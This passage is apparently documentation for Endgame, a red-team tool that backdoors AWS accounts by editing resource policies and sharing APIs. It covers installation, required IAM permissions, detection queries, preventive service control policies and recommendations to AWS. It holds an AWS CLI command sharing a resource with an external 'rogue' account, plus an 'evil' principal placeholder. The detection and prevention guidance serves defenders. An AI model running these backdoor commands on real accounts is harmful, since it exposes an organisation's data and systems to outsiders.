quicksight:DeleteUserByPrincipalId
quicksight:DescribeDataSetPermissions
quicksight:DescribeDataSourcePermissions
quicksight:RegisterUser
quicksight:UpdateDashboardPermissions
quicksight:UpdateDataSetPermissions
quicksight:UpdateDataSourcePermissions
quicksight:UpdateGroup
quicksight:UpdateIAMPolicyAssignment
quicksight:UpdateTemplatePermissions
quicksight:UpdateUser
### RAM
ram:AcceptResourceShareInvitation
ram:AssociateResourceShare
ram:CreateResourceShare
ram:DeleteResourceShare
ram:DisassociateResourceShare
ram:EnableSharingWithAwsOrganization
ram:RejectResourceShareInvitation
ram:UpdateResourceShare
### Redshift
redshift:AuthorizeSnapshotAccess
redshift:CreateClusterUser
redshift:CreateSnapshotCopyGrant
redshift:JoinGroup
redshift:ModifyClusterIamRoles
redshift:RevokeSnapshotAccess
### Route53 Resolver
route53resolver:PutResolverRulePolicy
### S3
s3:BypassGovernanceRetention
s3:DeleteAccessPointPolicy
s3:DeleteBucketPolicy
s3:ObjectOwnerOverrideToBucketOwner
s3:PutAccessPointPolicy
s3:PutAccountPublicAccessBlock
s3:PutBucketAcl
s3:PutBucketPolicy
s3:PutBucketPublicAccessBlock
s3:PutObjectAcl
s3:PutObjectVersionAcl
### S3 outposts
s3-outposts:DeleteAccessPointPolicy
s3-outposts:DeleteBucketPolicy
s3-outposts:PutAccessPointPolicy
s3-outposts:PutBucketPolicy
s3-outposts:PutObjectAcl
### Secrets Manager
secretsmanager:DeleteResourcePolicy
secretsmanager:PutResourcePolicy
secretsmanager:ValidateResourcePolicy
### Signer
signer:AddProfilePermission
signer:ListProfilePermissions
signer:RemoveProfilePermission
### SNS
sns:AddPermission
sns:CreateTopic
sns:RemovePermission
sns:SetTopicAttributes
### SQS
sqs:AddPermission
sqs:CreateQueue
sqs:RemovePermission
sqs:SetQueueAttributes
### SSM
ssm:ModifyDocumentPermission
### SSO
sso:AssociateDirectory
sso:AssociateProfile
sso:CreateApplicationInstance
sso:CreateApplicationInstanceCertificate
sso:CreatePermissionSet
sso:CreateProfile
sso:CreateTrust
sso:DeleteApplicationInstance
sso:DeleteApplicationInstanceCertificate
sso:DeletePermissionSet
sso:DeletePermissionsPolicy
sso:DeleteProfile
sso:DisassociateDirectory
sso:DisassociateProfile
sso:ImportApplicationInstanceServiceProviderMetadata
sso:PutPermissionsPolicy
sso:StartSSO
sso:UpdateApplicationInstanceActiveCertificate
sso:UpdateApplicationInstanceDisplayData
sso:UpdateApplicationInstanceResponseConfiguration
sso:UpdateApplicationInstanceResponseSchemaConfiguration
sso:UpdateApplicationInstanceSecurityConfiguration
sso:UpdateApplicationInstanceServiceProviderConfiguration
sso:UpdateApplicationInstanceStatus
sso:UpdateDirectoryAssociation
sso:UpdatePermissionSet
sso:UpdateProfile
sso:UpdateSSOConfiguration
sso:UpdateTrust
sso-directory:AddMemberToGroup
sso-directory:CreateAlias
sso-directory:CreateGroup
sso-directory:CreateUser
sso-directory:DeleteGroup
sso-directory:DeleteUser
sso-directory:DisableUser
sso-directory:EnableUser
sso-directory:RemoveMemberFromGroup
sso-directory:UpdateGroup
sso-directory:UpdatePassword
sso-directory:UpdateUser
sso-directory:VerifyEmail
### Storage Gateway
storagegateway:DeleteChapCredentials
storagegateway:SetLocalConsolePassword
storagegateway:SetSMBGuestPassword
storagegateway:UpdateChapCredentials
### WAF
waf:DeletePermissionPolicy
waf:PutPermissionPolicy
waf-regional:DeletePermissionPolicy
waf-regional:PutPermissionPolicy
wafv2:CreateWebACL
wafv2:DeletePermissionPolicy
wafv2:DeleteWebACL
wafv2:PutPermissionPolicy
wafv2:UpdateWebACL

### Backdoors via AWS Resource Access Manager
By default, AWS RAM allows you to share resources with **any** AWS Account.
Supported resource types are listed in the AWS documentation [here](https://docs.aws.amazon.com/ram/latest/userguide/shareable.html).
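Independent of this tool, the AWS CLI sketch below illustrates what sharing a resource with an external, attacker-controlled account via AWS RAM can look like. The share name, subnet ARN, and account ID are placeholders, not part of `endgame`:
```bash
# Placeholder values: a RAM-shareable resource (here, a VPC subnet) and a rogue account ID
aws ram create-resource-share \
  --name backdoor-share \
  --resource-arns arn:aws:ec2:us-east-1:111122223333:subnet/subnet-0abcdef1234567890 \
  --principals 999988887777 \
  --allow-external-principals
```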
## Status
This exploit method is not currently implemented. Please come back later when we've implemented it.
To get notified when it is available, you can do one of the following:
1. In GitHub, select "Watch for new releases"
2. Follow the author [@kmcquade](https://twitter.com/kmcquade3) on Twitter. He will announce when this feature is available 😃
### Resources not on roadmap
| Resource Type | Support Status |
|-------------------------------|----------------|
| S3 Objects | ❌ |
| CloudWatch Destinations | ❌ |
| Glue | ❌ |
* **S3 Objects**: We do not plan on sharing individual S3 objects given the sheer amount of bandwidth that would require. If you want this feature, I suggest scripting it.
* **CloudWatch Destinations**: Modifying CloudWatch destination policies would only provide the benefit of delivering victim logs to attacker accounts - but that would have to be open permanently. This is not as destructive or useful to an attacker as the rest of these exploits, so I am not including it here.
* **Glue**: According to the [AWS documentation on AWS Glue Resource Policies](https://docs.aws.amazon.com/glue/latest/dg/glue-resource-policies.html), _"An AWS Glue resource policy can only be used to manage permissions for Data Catalog resources. You can't attach it to any other AWS Glue resources such as jobs, triggers, development endpoints, crawlers, or classifiers"_. At first glance, this kind of data access is not as useful as destructive actions. We are open to supporting this resource, but only via pull requests.

# Terraform Demo Infrastructure
This program makes modifications to live AWS Infrastructure, which can vary from account to account. We have bootstrapped some of this for you.
> 🚨This will create real AWS infrastructure and will cost you money! 🚨
> _Note: It is not exposed to rogue IAM users or to the internet at first. That will only happen after you run the exposure commands._
## Prerequisites
* Valid credentials to an AWS account
* AWS CLI should be set up locally
* Terraform should be installed
### Installing Terraform
* Install `tfenv` (Terraform version manager) via Homebrew, and install Terraform 0.12.28
```bash
brew install tfenv
tfenv install 0.12.28
tfenv use 0.12.28
```
### Build the demo infrastructure
* Run the Terraform code to generate the example AWS resources.
```bash
make terraform-demo
```
* Don't forget to clean up afterwards.
```bash
make terraform-destroy
```

# Testing
## Unit tests
* Run [pytest](https://docs.pytest.org/en/stable/) with the following:
```bash
make test
```
## Security tests
* Run [bandit](https://bandit.readthedocs.io/en/latest/) with the following:
```bash
make security-test
```
## Integration tests
After making any modifications to the program, you can run a full-fledged integration test, using this program against your own test infrastructure in AWS.
* First, set your environment variables
```bash
# Set the environment variable for the username that you will create a backdoor for.
export EVIL_PRINCIPAL="arn:aws:iam::999988887777:user/evil"
export AWS_REGION="us-east-1"
export AWS_PROFILE="default"
```
* Then run the full-fledged integration test:
```bash
make integration-test
```
This does the following:
* Sets up your local dev environment (see `setup-dev` in the `Makefile`)
* Creates the Terraform infrastructure (see `terraform-demo` in the `Makefile`)
* Runs `list-resources`, `exploit --dry-run`, and `expose` against this live infrastructure
* Destroys the Terraform infrastructure (see `terraform-destroy` in the `Makefile`)
Note that during the integration test, the `expose` command does not expose the resources to the world; it only exposes them to your rogue user.

docs/custom.css
div.doc-contents:not(.first) {
padding-left: 25px;
border-left: 4px solid rgba(230, 230, 230);
margin-bottom: 80px;
}
div.doc-module {
font-size: 1em;
}
h5.doc-heading {
text-transform: none !important;
}
h6.hidden-toc {
margin: 0 !important;
position: relative;
top: -70px;
}
h6.hidden-toc::before {
margin-top: 0 !important;
padding-top: 0 !important;
}
h6.hidden-toc a.headerlink {
display: none;
}
td code {
word-break: normal !important;
}
td p {
margin-top: 0 !important;
margin-bottom: 0 !important;
}

docs/detection.md
# Detection
There are four methods that blue teams can use to **detect** AWS Resource Exposure Attacks:
1. User Agent Detection (Endgame specific)
2. API call detection
3. Behavioral-based detection
4. AWS Access Analyzer
While (1) User Agent Detection is specific to the usage of Endgame, (2) API Call Detection, (3) Behavioral-based Detection, and (4) AWS Access Analyzer are strategies to detect Resource Exposure Attacks regardless of whether the attacker is using Endgame to do it.
## Detecting Resource Exposure Attacks
### API Call Detection
Further documentation on how to query for specific API calls made to each service by endgame is available in the [risks documentation](./risks).
### Behavioral-based detection
Behavioral-based detection is currently being researched and developed by [Ryan Stalets](https://twitter.com/RyanStalets). [GitHub issue #46](https://github.com/salesforce/endgame/issues/46) is being used to track this work. We welcome all contributions and discussion!
## Detecting Endgame
### User Agent Detection
Endgame uses the user agent `HotDogsAreSandwiches` by default. While this can be overridden using the `--cloak` flag, defense teams can still use it as an IOC.
The following CloudWatch Insights query will expose events with the `HotDogsAreSandwiches` user agent in CloudTrail logs:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter userAgent='HotDogsAreSandwiches'
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
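If you prefer to run the same query from the CLI rather than the console, the following is a minimal sketch; the log group name is a placeholder for whichever log group receives your CloudTrail logs:
```bash
# Placeholder: the CloudWatch Logs group that receives your CloudTrail logs
LOG_GROUP="CloudTrail/DefaultLogGroup"

# Start a CloudWatch Logs Insights query covering the last 24 hours
QUERY_ID=$(aws logs start-query \
  --log-group-name "$LOG_GROUP" \
  --start-time $(( $(date +%s) - 86400 )) \
  --end-time $(date +%s) \
  --query-string "fields eventTime, eventSource, eventName, userIdentity.arn, userAgent | filter userAgent='HotDogsAreSandwiches'" \
  --query 'queryId' --output text)

# Fetch the results once the query finishes
aws logs get-query-results --query-id "$QUERY_ID"
```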
Further documentation on how to query for specific API calls made to each service by endgame is available in the [risks documentation](risks).
### AWS Access Analyzer
[AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/what-is-access-analyzer.html) analyzes new or updated resource-based policies within 30 minutes of policy updates (triggered by CloudTrail log entries), and during periodic scans (every 24 hours). If an attacker leverages the `expose` or `smash` commands but quickly rolls back the changes with `--undo`, you might not find out about the attack with Access Analyzer until 30 minutes later.
However, Access Analyzer can still be especially useful if attackers do gain a foothold in your infrastructure. Whether the attacker ran Endgame or performed resource exposure attacks without the tool, you can still use Access Analyzer to alert on those changes so you can respond to the issue instead of allowing a persistent backdoor.
Consider leveraging `aws:PrincipalOrgID` or `aws:PrincipalOrgPaths` in your Access Analyzer filter keys to detect access from IAM principals outside your AWS account. See [Access Analyzer Filter Keys](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-reference-filter-keys.html) for more details.
## Further Reading
Additional information on AWS resource policies, how this tool works in the victim account, and identification/containment suggestions is [here](resource-policy-primer.md).

docs/iam-permissions.md
# IAM Permissions
The IAM Permissions listed below are used to create these backdoors.
You don't need **all** of these permissions to run the tool. You just need the subset that covers the services you want to target. For example, `s3:ListAllMyBuckets`, `s3:GetBucketPolicy`, and `s3:PutBucketPolicy` are all the permissions needed to leverage this tool to expose S3 buckets (see the sketch after the policy below).
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "IAmInevitable",
"Effect": "Allow",
"Action": [
"acm-pca:DeletePolicy",
"acm-pca:GetPolicy",
"acm-pca:ListCertificateAuthorities",
"acm-pca:PutPolicy",
"ec2:DescribeImageAttribute",
"ec2:DescribeImages",
"ec2:DescribeSnapshotAttribute",
"ec2:DescribeSnapshots",
"ec2:ModifySnapshotAttribute",
"ec2:ModifyImageAttribute",
"ecr:DescribeRepositories",
"ecr:DeleteRepositoryPolicy",
"ecr:GetRepositoryPolicy",
"ecr:SetRepositoryPolicy",
"elasticfilesystem:DescribeFileSystems",
"elasticfilesystem:DescribeFileSystemPolicy",
"elasticfilesystem:PutFileSystemPolicy",
"es:DescribeElasticsearchDomainConfig",
"es:ListDomainNames",
"es:UpdateElasticsearchDomainConfig",
"glacier:GetVaultAccessPolicy",
"glacier:ListVaults",
"glacier:SetVaultAccessPolicy",
"iam:GetRole",
"iam:ListRoles",
"iam:UpdateAssumeRolePolicy",
"kms:GetKeyPolicy",
"kms:ListKeys",
"kms:ListAliases",
"kms:PutKeyPolicy",
"lambda:AddLayerVersionPermission",
"lambda:AddPermission",
"lambda:GetPolicy",
"lambda:GetLayerVersionPolicy",
"lambda:ListFunctions",
"lambda:ListLayers",
"lambda:ListLayerVersions",
"lambda:RemoveLayerVersionPermission",
"lambda:RemovePermission",
"logs:DescribeResourcePolicies",
"logs:DeleteResourcePolicy",
"logs:PutResourcePolicy",
"rds:DescribeDbClusterSnapshots",
"rds:DescribeDbClusterSnapshotAttributes",
"rds:DescribeDbSnapshots",
"rds:DescribeDbSnapshotAttributes",
"rds:ModifyDbSnapshotAttribute",
"rds:ModifyDbClusterSnapshotAttribute",
"s3:GetBucketPolicy",
"s3:ListAllMyBuckets",
"s3:PutBucketPolicy",
"secretsmanager:GetResourcePolicy",
"secretsmanager:DeleteResourcePolicy",
"secretsmanager:ListSecrets",
"secretsmanager:PutResourcePolicy",
"ses:DeleteIdentityPolicy",
"ses:GetIdentityPolicies",
"ses:ListIdentities",
"ses:ListIdentityPolicies",
"ses:PutIdentityPolicy",
"sns:AddPermission",
"sns:ListTopics",
"sns:GetTopicAttributes",
"sns:RemovePermission",
"sqs:AddPermission",
"sqs:GetQueueUrl",
"sqs:GetQueueAttributes",
"sqs:ListQueues",
"sqs:RemovePermission"
],
"Resource": "*"
}
]
}
```
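As a worked example of the S3-only subset mentioned above, here is a minimal sketch that creates a standalone managed policy scoped to exposing S3 buckets. The policy name and file name are placeholders, not something the tool requires:
```bash
# Minimal S3-only subset of the permissions above (placeholder names)
cat > s3-exposure-only.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "S3ExposureOnly",
      "Effect": "Allow",
      "Action": [
        "s3:ListAllMyBuckets",
        "s3:GetBucketPolicy",
        "s3:PutBucketPolicy"
      ],
      "Resource": "*"
    }
  ]
}
EOF

aws iam create-policy \
  --policy-name s3-exposure-only \
  --policy-document file://s3-exposure-only.json
```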

Binary image files not shown (including docs/images/endgame.gif).

docs/index.md
# Endgame: Creating Backdoors in AWS
An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire Internet 😈
<p align="center">
<img src="images/endgame.gif">
</p>
Endgame abuses AWS's resource permission model to grant rogue users (or the Internet) access to an AWS account's resources with a single command. It does this through one of three methods:
1. Modifying [resource-based policies](https://endgame.readthedocs.io/en/latest/resource-policy-primer/) (such as [S3 Bucket policies](https://docs.aws.amazon.com/AmazonS3/latest/userguide/WebsiteAccessPermissionsReqd.html#bucket-policy-static-site) or [Lambda Function policies](https://docs.aws.amazon.com/lambda/latest/dg/access-control-resource-based.html#permissions-resource-xaccountinvoke))
2. Resources that can be made public through sharing APIs (such as [Amazon Machine Images (AMIs)](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/sharingamis-explicit.html), [EBS disk snapshots](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html), and [RDS database snapshots](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ShareSnapshot.html))
3. Sharing resources via [AWS Resource Access Manager (RAM)](https://docs.aws.amazon.com/ram/latest/userguide/shareable.html)
Endgame was created to:
* Push [AWS](https://endgame.readthedocs.io/en/latest/recommendations-to-aws/) to improve coverage of AWS Access Analyzer so AWS users can protect themselves.
* Show [blue teams](https://endgame.readthedocs.io/en/latest/recommendations-to-blue-teams/) and developers what kind of damage can be done by overprivileged/leaked accounts.
* Help red teams to demonstrate impact of their access.
Endgame demonstrates (with a bit of shock and awe) how simple human errors in excessive permissions (such as granting `s3:*` access instead of `s3:GetObject`) can be abused by attackers. These are not new attacks, but AWS's ability to **detect** _and_ **prevent** these attacks falls short of what customers need to protect themselves. This is what inspired us to write this tool. Follow the [Tutorial](./tutorial.md) and observe how you can expose resources across **17 different AWS services** to the Internet in a matter of seconds.
The resource types that can be exposed are of high value to attackers. This can include:
* Privileged compute access (by exposing who can invoke `lambda` functions)
* Database snapshots (`rds`), Storage buckets (`s3`), file systems (`elasticfilesystem`), storage backups (`glacier`), disk snapshots (`ebs` snapshots),
* Encryption keys (`kms`), secrets (`secretsmanager`), and private certificate authorities (`acm-pca`)
* Messaging and notification services (`sqs` queues, `sns` topics, `ses` authorized senders)
* Compute artifacts (`ec2` AMIs, `ecr` images, `lambda` layers)
* Logging endpoints (`cloudwatch` resource policies)
* Search and analytics engines (`elasticsearch` clusters)
Endgame is an attack tool, but it was written with a specific purpose. We wrote this tool with desired outcomes for the following audiences:
1. **AWS**: We want AWS to empower their customers with the capabilities to fight these attacks. Our recommendations are outlined in the [Recommendations to AWS](./recommendations-to-aws.md) section.
2. **AWS Customers and their customers**: It is better for risks to be easily understood, along with how to mitigate them, than to force people to fight something novel. By increasing awareness about Resource Exposure and excessive permissions, we can protect ourselves against attacks where attackers previously held the advantage and AWS customers were left blind.
3. **Blue Teams**: Defense teams can leverage the guidance around user-agent detection, API call detection, and behavioral detection outlined in the [Recommendations to Blue Teams](prevention.md) section.
4. **Red Teams**: This will make for some very eventful red team exercises. Make sure you give the Blue Team kudos when they catch you!
## Supported Backdoors
Endgame can create backdoors for resources in any of the services listed in the table below.
Note: At the time of this writing, [AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) does **NOT** support auditing **11 out of the 18 services** that Endgame attacks. Given that Access Analyzer is intended to detect this exact kind of violation, we kindly suggest to the AWS Team that they support all resources that can be attacked using Endgame. 😊
| Backdoor Resource Type | Endgame | [AWS Access Analyzer Support][1] |
|---------------------------------------------------------|---------|----------------------------------|
| [ACM Private CAs](risks/acm-pca.md) | ✅ | ❌ |
| [CloudWatch Resource Policies](risks/logs.md) | ✅ | ❌ |
| [EBS Volume Snapshots](risks/ebs.md) | ✅ | ❌ |
| [EC2 AMIs](risks/amis.md) | ✅ | ❌ |
| [ECR Container Repositories](risks/ecr.md) | ✅ | ❌ |
| [EFS File Systems](risks/efs.md) | ✅ | ❌ |
| [ElasticSearch Domains](risks/es.md) | ✅ | ❌ |
| [Glacier Vault Access Policies](risks/glacier.md) | ✅ | ❌ |
| [IAM Roles](risks/iam-roles.md) | ✅ | ✅ |
| [KMS Keys](risks/kms.md) | ✅ | ✅ |
| [Lambda Functions](risks/lambda-functions.md) | ✅ | ✅ |
| [Lambda Layers](risks/lambda-layers.md) | ✅ | ✅ |
| [RDS Snapshots](risks/rds-snapshots.md) | ✅ | ❌ |
| [S3 Buckets](risks/s3.md) | ✅ | ✅ |
| [Secrets Manager Secrets](risks/secretsmanager.md) | ✅ | ✅ |
| [SES Sender Authorization Policies](risks/ses.md) | ✅ | ❌ |
| [SQS Queues](risks/sqs.md) | ✅ | ✅ |
| [SNS Topics](risks/sns.md) | ✅ | ❌ |
[1]: https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html

docs/installation.md
# Installation
* pip3
```bash
pip3 install --user endgame
```
* Homebrew (this will not work until the repository is public)
```bash
brew tap kmcquade/endgame https://github.com/kmcquade/endgame
brew install endgame
```
Now you should be able to execute `endgame` from the command line by running `endgame --help`.
#### Shell Completion
* To enable Bash completion, put this in your `~/.bashrc`:
```bash
eval "$(_ENDGAME_COMPLETE=source endgame)"
```
* To enable ZSH completion, put this in your `~/.zshrc`:
```bash
eval "$(_ENDGAME_COMPLETE=source_zsh endgame)"
```

docs/prevention.md
# Prevention
There are 6 general methods that blue teams can use to **prevent** AWS Resource Exposure Attacks:
1. Use AWS KMS Customer-Managed Keys to encrypt resources
2. Leverage Strong Resource-based Policies
3. Trusted Accounts Only
4. Inventory which IAM Principals are capable of Resource Exposure
5. AWS Service Control Policies
6. Prevent AWS RAM External Principals
## Use AWS KMS Customer-Managed Keys
If an attacker does not have access to your Customer Managed Key, the attacker cannot access the resource. You can leverage this strategy so that even if your resources are leaked to the internet, an attacker without access to the encryption key still cannot read them.
Additionally, use strong resource-based policies on the Customer Managed Keys and leverage them to prevent other IAM Principals in the account from using that key for decrypt operations or management operations. If the attacker cannot use the key to decrypt, they effectively cannot access the resource.
## Leverage strong resource-based policies
Strong resource-based policies can ensure that only the intended IAM principals can modify the KMS key policy (i.e., using `kms:PutKeyPolicy` permissions). Under this scenario, even if an attacker has privileged access, if they are not granted `kms:PutKeyPolicy` by the KMS key policy, they can't subvert your KMS encryption.
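As a rough sketch of this pattern, the example below applies a key policy in which only a dedicated administrator role holds `kms:PutKeyPolicy` and the key's other management permissions. The account ID, key ID, and role names are placeholders; adapt the statements to your own key administration model (KMS will reject a policy that would lock you out of key management unless you explicitly bypass the safety check):
```bash
# Placeholder identifiers
ACCOUNT_ID="111122223333"
KEY_ID="1234abcd-12ab-34cd-56ef-1234567890ab"

cat > key-policy.json <<EOF
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "OnlyKeyAdminsManageTheKeyPolicy",
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::${ACCOUNT_ID}:role/kms-admin"},
      "Action": [
        "kms:PutKeyPolicy",
        "kms:GetKeyPolicy",
        "kms:DescribeKey",
        "kms:ScheduleKeyDeletion"
      ],
      "Resource": "*"
    },
    {
      "Sid": "ApplicationRoleCanUseTheKey",
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::${ACCOUNT_ID}:role/app-role"},
      "Action": [
        "kms:Encrypt",
        "kms:Decrypt",
        "kms:GenerateDataKey"
      ],
      "Resource": "*"
    }
  ]
}
EOF

# Key policies are always named "default"; run this as the kms-admin role
aws kms put-key-policy \
  --key-id "$KEY_ID" \
  --policy-name default \
  --policy file://key-policy.json
```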
## Trusted Accounts Only
Practice good security hygiene throughout your SDLC. Ensure that only trusted accounts are allowed any level of access to your accounts, especially via resource-based policies.
## Inventory which IAM Principals are Capable of Resource Exposure
Consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## AWS Service Control Policies (SCPs)
AWS Service Control Policies (SCPs) cannot be used to strictly prevent resources from becoming public.
However, there are well-known AWS Service Control Policies that can force encryption on EBS and RDS snapshots, which essentially also blocks public access as mentioned above.
### Enforce RDS Encryption
As covered in [this blog post](https://medium.com/@cbchhaya/aws-scp-to-mandate-rds-encryption-6b4dc8b036a), the following AWS SCP can be used to Mandate RDS Encryption:
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "StatementForOtherRDS",
"Effect": "Deny",
"Action": [
"rds:CreateDBInstance"
],
"Resource": [
"*"
],
"Condition": {
"ForAnyValue:StringEquals": {
"rds:DatabaseEngine": [
"mariadb",
"mysql",
"oracle-ee",
"oracle-se2",
"oracle-se1",
"oracle-se",
"postgres",
"sqlserver-ee",
"sqlserver-se",
"sqlserver-ex",
"sqlserver-web"
]
},
"Bool": {
"rds:StorageEncrypted": "false"
}
}
},
{
"Sid": "StatementForAurora",
"Effect": "Deny",
"Action": [
"rds:CreateDBCluster"
],
"Resource": [
"*"
],
"Condition": {
"Bool": {
"rds:StorageEncrypted": "false"
}
}
}
]
}
```
### Require Encryption on All S3 Buckets
The following SCP requires AES256 server-side encryption on all Amazon S3 object uploads in an AWS account.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"s3:PutObject"
],
"Resource": "*",
"Effect": "Deny",
"Condition": {
"StringNotEquals": {
"s3:x-amz-server-side-encryption": "AES256"
}
}
},
{
"Action": [
"s3:PutObject"
],
"Resource": "*",
"Effect": "Deny",
"Condition": {
"Bool": {
"s3:x-amz-server-side-encryption": false
}
}
}
]
}
```
### Protect S3 Block Public Access
After setting up your AWS account, set the [S3 Block Public Access](https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html) to enforce at the AWS Account level (not just the bucket level). Then, apply this SCP to prevent users or roles in any affected account from modifying the S3 Block Public Access Settings in an Account.
Note: This will only eliminate the risk of modifying an S3 bucket policy to allow `*` Principals. It will not eliminate the risk of modifying an S3 bucket policy to allow rogue IAM users or rogue accounts.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"s3:PutBucketPublicAccessBlock"
],
"Resource": "*",
"Effect": "Deny"
}
]
}
```
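Before applying the SCP, you can turn on the account-level setting itself. A minimal sketch (the account ID is a placeholder):
```bash
# Placeholder account ID - enables S3 Block Public Access for the whole account
aws s3control put-public-access-block \
  --account-id 111122223333 \
  --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true
```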
### Protect AWS Access Analyzer
While AWS Access Analyzer has its shortcomings, it is a uniquely useful tool that you should use to help address the risk of Resource Exposure Attacks.
When using AWS Access Analyzer, it is paramount that its configuration is protected against malicious modification by users who seek to disable security alerts before performing malicious activities.
The following SCP prevents users or roles in any affected account from deleting AWS Access Analyzer in an AWS account:
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"access-analyzer:DeleteAnalyzer"
],
"Resource": "*",
"Effect": "Deny"
}
]
}
```
### Prevent AWS RAM External Principals
This SCP prevents users or roles in any affected account from creating Resource Access Shares using RAM that are shared with external principals outside the organization. This can categorically eliminate one of the three methods of Resource Exposure identified by Endgame and is highly suggested.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"*"
],
"Resource": "*",
"Effect": "Deny",
"Condition": {
"Bool": {
"ram:AllowsExternalPrincipals": "true"
}
}
}
]
}
```
## Further Reading
* [Blog Post about Using AWS SCPs to Mandate RDS Encryption](https://medium.com/@cbchhaya/aws-scp-to-mandate-rds-encryption-6b4dc8b036a)

# Recommendations to AWS
While [Cloudsplaining](https://opensource.salesforce.com/cloudsplaining/) (a Salesforce-produced AWS IAM assessment tool) showed us the pervasiveness of least privilege violations in AWS IAM across the industry, Endgame shows how easy these attacks already are for attackers. These are not new attacks, but AWS's ability to **detect** _and_ **prevent** these attacks falls short of what customers need to protect themselves.
[AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/what-is-access-analyzer.html) is a tool produced by AWS that helps you identify the resources in your organization and accounts, such as Amazon S3 buckets or IAM roles, that are shared with an external entity. In short, it **detects** instances of this resource exposure problem. However, it does not by itself meet customer needs, due to current gaps in coverage and the lack of preventative tooling to complement it.
At the time of this writing, [AWS Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) does **NOT** support auditing **11 out of the 18 services** that Endgame attacks. Given that Access Analyzer is intended to detect this exact kind of violation, we kindly suggest to the AWS Team that they support all resources that can be attacked using Endgame. 😊
The lack of preventative tooling makes this issue more difficult for customers. Ideally, customers should be able to say, _"Nobody in my AWS Organization is allowed to share **any** resources that can be exposed by Endgame outside of the organization, unless that resource is in an exemption list."_ This **should** be possible, but it is not. It is not even possible to use [AWS Service Control Policies (SCPS)](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps.html) - AWS's preventative guardrails service - to prevent `sts:AssumeRole` calls from outside your AWS Organization. The current SCP service limit of 5 SCPs per AWS account compounds this problem.
We recommend that AWS take the following measures in response:
* Increase Access Analyzer Support to cover the resources that can be exposed via Resource-based Policy modification, AWS RAM resource sharing, and resource-specific sharing APIs (such as RDS snapshots, EBS snapshots, and EC2 AMIs)
* Create GuardDuty rules that detect anomalous exposure of resources outside your AWS Organization.
* Expand the current limit of 5 SCPs per AWS account to 200. (for comparison, the Azure equivalent - Azure Policies - has a limit of [200 Policy or Initiative Assignments per subscription](https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/azure-subscription-service-limits#azure-policy-limits))
* Improve the AWS SCP service to support an "Audit" mode that would record in CloudTrail whether API calls would have been denied had the SCP not been in audit mode. This would increase customer adoption and make it easier for customers to both pilot and roll out new guardrails. (For comparison, the Azure equivalent - Azure Policies - already [supports Audit mode](https://docs.microsoft.com/en-us/azure/governance/policy/concepts/effects#audit).)
* Support the use of SCPs to prevent `sts:AssumeRole` calls from outside your AWS Organization, with targeted exceptions.
* Add IAM Condition Keys to all the IAM Actions that are used to perform Resource Exposure. These IAM Condition Keys should be used to prevent these resources from (1) being shared with the public **and** (2) being shared outside of your `aws:PrincipalOrgPath`.

mkdocs==1.1.2
mkdocs-material==6.2.8
mkdocs-material-extensions==1.0.1
mkdocstrings==0.14.0
atomicwrites==1.4.0
distlib==0.3.1
filelock==3.0.12
Pygments==2.8.0
pymdown-extensions==8.1.1
pytkdocs==0.10.1

# AWS Resource Policies, Endgame, and You
## Background
AWS resource policies enable developers to grant permissions to specified principals (or the internet) using policy documents that apply only to a specific resource (e.g., buckets, KMS keys, etc.). This enables very granular access control. For example, you can grant an IAM user in another account very specific permissions to a single S3 bucket without requiring them to assume a role in your account.
## Identity Policies vs. Resource Policies
The key thing to remember with resource-based policies is that they are attached _directly to an AWS resource_, like an S3 bucket, and are considered as one component in the policy evaluation that occurs when an API call is made. They are managed _by the service itself_, not IAM. Identity-based policies are attached to _an IAM principal_ such as an IAM user or role. These policies define what a principal can do across all services and resources; however, they do not always limit what permissions can be granted to the principal by a resource-based policy.
## Policy Evaluation Process
In the context of Endgame, the most important process to understand is the one documented [here](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_evaluation-logic-cross-account.html). This process defines how resource policies and identity policies interact when _cross-account_ calls are made to a resource, which is the most likely scenario for an Endgame victim. To summarize the document, when the principal making the API call is in a different account than the resource the call targets, both the identity policy of the calling principal and the resource policy of the subject resource must permit the call (this is different than when the principal and resource are in the same account). Endgame exploits the fact that since the attacker controls their own account, access to a resource in a victim account can be granted using the resource policy alone.
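To make that concrete, the sketch below grants a principal in another account access to a bucket purely through the bucket's resource policy, with no corresponding role in the bucket owner's account. The bucket name is a placeholder; the principal is the same example rogue user used throughout these docs:
```bash
# Placeholder bucket name and example rogue principal
cat > cross-account-policy.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowCrossAccountRead",
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::999988887777:user/evil"},
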